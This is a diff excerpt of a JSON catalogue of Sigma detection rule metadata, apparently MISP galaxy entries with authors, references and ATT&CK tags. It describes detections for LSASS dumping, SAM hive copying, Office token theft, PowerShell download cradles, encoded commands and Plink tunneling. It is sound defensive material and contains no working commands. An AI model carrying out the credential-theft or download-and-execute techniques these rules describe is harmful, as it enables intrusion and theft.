[ - "https://mrd0x.com/stealing-tokens-from-office-applications/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1528" - ] - }, - "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", - "value": "Suspicious Office Token Search Via CLI" - }, - { - "description": "The OpenWith.exe executes other binary", - "meta": { - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", - "creation_date": "2019/10/12", - "falsepositive": [ - "Legitimate use of OpenWith.exe by legitimate user" - ], - "filename": "proc_creation_win_susp_openwith.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml", - "https://twitter.com/harr0ey/status/991670870384021504", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_openwith.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "value": "OpenWith.exe Executes Specified Binary" - }, - { - "description": "Detects EnableUnsafeClientMailRules used for Script Execution from Outlook", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/12/27", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_outlook.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/sensepost/ruler", - "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" - ] - }, - "uuid": "e212d415-0e93-435f-9e1a-f29005bb4723", - "value": "Suspicious Execution from Outlook" - }, - { - "description": "Detects a suspicious program execution in Outlook temp folder", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/10/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_outlook_temp.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_outlook_temp.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", - "value": "Execution in Outlook Temp Folder" - }, - { - "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_parents.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/x86matthew/status/1505476263464607744?s=12", - "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" - ], - "tags": "No established tags" - }, - "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", - "value": "Suspicious Process Parents" - }, - { - "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", "meta": { "author": "Tim Rauch", - "creation_date": "2022/09/28", + "creation_date": "2022/09/20", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_parent_of_conhost.yml", + "filename": "proc_creation_win_shadowcopy_deletion_via_powershell.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parent_of_conhost.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", - "value": "Conhost Spawned By Suspicious Parent Process" - }, - { - "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/10/10", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_pchunter.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.xuetr.com/", - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", - "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pchunter.yml" - ], - "tags": "No established tags" - }, - "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", - "value": "PCHunter Usage" - }, - { - "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/05", - "falsepositive": [ - "Use of Program Compatibility Troubleshooter Helper" - ], - "filename": "proc_creation_win_susp_pcwutl.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Pcwutl/", - "https://twitter.com/harr0ey/status/989617817849876488", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pcwutl.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", - "value": "Code Execution via Pcwutl.dll" - }, - { - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "meta": { - "author": "Julia Fomina, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" - ], - "filename": "proc_creation_win_susp_pester.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Oddvarmoe/status/993383596244258816", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", - "value": "Execute Code with Pester.bat" - }, - { - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "meta": { - "author": "frack113, Nasreddine Bencherchali", - "creation_date": "2022/08/20", - "falsepositive": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" - ], - "filename": "proc_creation_win_susp_pester_parent.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Oddvarmoe/status/993383596244258816", - "https://twitter.com/_st0pp3r_/status/1560072680887525378", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", - "value": "Execute Code with Pester.bat as Parent" - }, - { - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "meta": { - "author": "Ilya Krestinichev", - "creation_date": "2022/11/03", - "falsepositive": [ - "False positive could occur in admin scripts that execute inline" - ], - "filename": "proc_creation_win_susp_ping_del.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://www.acronis.com/en-us/blog/posts/lockbit-ransomware/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_del.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "value": "Suspicious Ping And Del Combination" - }, - { - "description": "Detects a ping command that uses a hex encoded IP address", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/03/23", - "falsepositive": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" - ], - "filename": "proc_creation_win_susp_ping_hex_ip.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna", - "https://twitter.com/vysecurity/status/977198418354491392", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ping_hex_ip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1027" - ] - }, - "uuid": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "value": "Ping Hex IP" - }, - { - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/19", - "falsepositive": [ - "Administrative activity using a remote port forwarding to a local port" - ], - "filename": "proc_creation_win_susp_plink_port_forward.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", - "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ] - }, - "uuid": "48a61b29-389f-4032-b317-b30de6b95314", - "value": "Suspicious Plink Port Forwarding" - }, - { - "description": "Execution of plink to perform data exfiltration and tunneling", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/08/04", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_plink_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ] - }, - "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", - "value": "Suspicious Plink Usage RDP Tunneling" - }, - { - "description": "Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout", - "meta": { - "author": "frack113", - "creation_date": "2022/11/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powercfg.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powercfg.yml" - ], - "tags": [ - "attack.defense_evasion" - ] - }, - "uuid": "f8d6a15e-4bc8-4c27-8e5d-2b10f0b73e5b", - "value": "Suspicious Powercfg Execution To Change Lock Screen Timeout" - }, - { - "description": "Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/24", - "falsepositive": [ - "Other tools that work with encoded scripts in the command line instead of script files" - ], - "filename": "proc_creation_win_susp_powershell_cmd_patterns.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_cmd_patterns.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "b9d9cc83-380b-4ba3-8d8f-60c0e7e2930c", - "value": "Suspicious PowerShell Encoded Command Patterns" - }, - { - "description": "Detects suspicious ways to download files or content using PowerShell", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/24", - "falsepositive": [ - "Scripts or tools that download files" - ], - "filename": "proc_creation_win_susp_powershell_download_cradles.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_cradles.yml" - ], - "tags": "No established tags" - }, - "uuid": "6e897651-f157-4d8f-aaeb-df8151488385", - "value": "PowerShell Web Download" - }, - { - "description": "Detects suspicious ways to download files or content and execute them using PowerShell", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/24", - "falsepositive": [ - "Scripts or tools that download files and execute them" - ], - "filename": "proc_creation_win_susp_powershell_download_iex.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_download_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "value": "PowerShell Web Download and Execution" - }, - { - "description": "Detects suspicious powershell command line parameters used in Empire", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/04/20", - "falsepositive": [ - "Other tools that incidentally use the same command line parameters" - ], - "filename": "proc_creation_win_susp_powershell_empire_launch.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_launch.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", - "value": "Empire PowerShell Launch Parameters" - }, - { - "description": "Detects some Empire PowerShell UAC bypass methods", - "meta": { - "author": "Ecco", - "creation_date": "2019/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_empire_uac_bypass.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_empire_uac_bypass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" - ] - }, - "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", - "value": "Empire PowerShell UAC Bypass" - }, - { - "description": "Commandline to launch powershell with a base64 payload", - "meta": { - "author": "frack113", - "creation_date": "2022/01/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_encode.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets", - "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/", - "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encode.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", - "value": "Suspicious Execution of Powershell with Base64" - }, - { - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_encoded_param.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1281103918693482496", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", - "value": "PowerShell Encoded Character Syntax" - }, - { - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", - "meta": { - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", - "creation_date": "2018/09/03", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_susp_powershell_enc_cmd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_enc_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", - "value": "Suspicious Encoded PowerShell Command Line" - }, - { - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/04/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_getprocess_lsass.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/PythonResponder/status/1385064506049630211", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ] - }, - "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "value": "PowerShell Get-Process LSASS" - }, - { - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "meta": { - "author": "John Lambert (rule)", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_hidden_b64_cmd.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", - "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines" - }, - { - "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/03/24", - "falsepositive": [ - "Legitimate scripts that use IEX" - ], - "filename": "proc_creation_win_susp_powershell_iex_patterns.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml" - ], - "tags": "No established tags" - }, - "uuid": "09576804-7a05-458e-a817-eb718ca91f54", - "value": "Suspicious PowerShell IEX Execution Patterns" - }, - { - "description": "Detects suspicious powershell invocations from interpreters or unusual programs", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/16", - "falsepositive": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" - ], - "filename": "proc_creation_win_susp_powershell_parent_combo.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "value": "Suspicious PowerShell Invocation Based on Parent Process" - }, - { - "description": "Detects a suspicious parents of powershell.exe", - "meta": { - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", - "creation_date": "2020/03/20", - "falsepositive": [ - "Other scripts" - ], - "filename": "proc_creation_win_susp_powershell_parent_process.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", - "value": "Suspicious PowerShell Parent Process" - }, - { - "description": "Detects suspicious PowerShell scripts accessing SAM hives", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/07/29", - "falsepositive": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" - ], - "filename": "proc_creation_win_susp_powershell_sam_access.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/splinter_code/status/1420546784250769408", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "1af57a4b-460a-4738-9034-db68b880c665", - "value": "PowerShell SAM Copy" - }, - { - "description": "Detects suspicious sub processes spawned by PowerShell", - "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2022/04/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_sub_processes.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/ankit_anubhav/status/1518835408502620162", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml" - ], - "tags": "No established tags" - }, - "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "value": "Suspicious PowerShell Sub Processes" - }, - { - "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_powershell_webclient_casing.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", - "value": "Net WebClient Casing Anomalies" - }, - { - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" - ], - "filename": "proc_creation_win_susp_pressynkey_lolbin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1463526834918854661", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", - "value": "NodejsTools PressAnyKey Lolbin" - }, - { - "description": "Attackers can use print.exe for remote file copy", - "meta": { - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "creation_date": "2020/10/05", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_print.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Print/", - "https://twitter.com/Oddvarmoe/status/985518877076541440", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", - "value": "Abusing Print Executable" - }, - { - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "meta": { - "author": "Florian Roth", - "creation_date": "2018/10/30", - "falsepositive": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" - ], - "filename": "proc_creation_win_susp_procdump_lsass.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" - ] - }, - "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", - "value": "Suspicious Use of Procdump on LSASS" - }, - { - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/10/10", - "falsepositive": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "filename": "proc_creation_win_susp_process_hacker.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://processhacker.sourceforge.io/", - "https://github.com/winsiderss/systeminformer", - "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" - ], - "tags": "No established tags" - }, - "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", - "value": "Process Hacker / System Informer Usage" - }, - { - "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/11", - "falsepositive": [ - "Legitimate tools that accidentally match on the searched patterns" - ], - "filename": "proc_creation_win_susp_progname.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" - ], - "tags": "No established tags" - }, - "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", - "value": "Suspicious Program Names" - }, - { - "description": "Detects user accept agreement execution in psexec commandline", - "meta": { - "author": "omkar72", - "creation_date": "2020/10/30", - "falsepositive": [ - "Administrative scripts." - ], - "filename": "proc_creation_win_susp_psexec_eula.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569", - "attack.t1021" - ] - }, - "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", - "value": "Psexec Accepteula Condition" - }, - { - "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", - "meta": { - "author": "Romaissa Adjailia, FLorian Roth", - "creation_date": "2022/07/21", - "falsepositive": [ - "Legitimate administrative tasks" - ], - "filename": "proc_creation_win_susp_psexesvc.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.youtube.com/watch?v=ro2QuZTIMBM", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", - "value": "PsExec Service Execution" 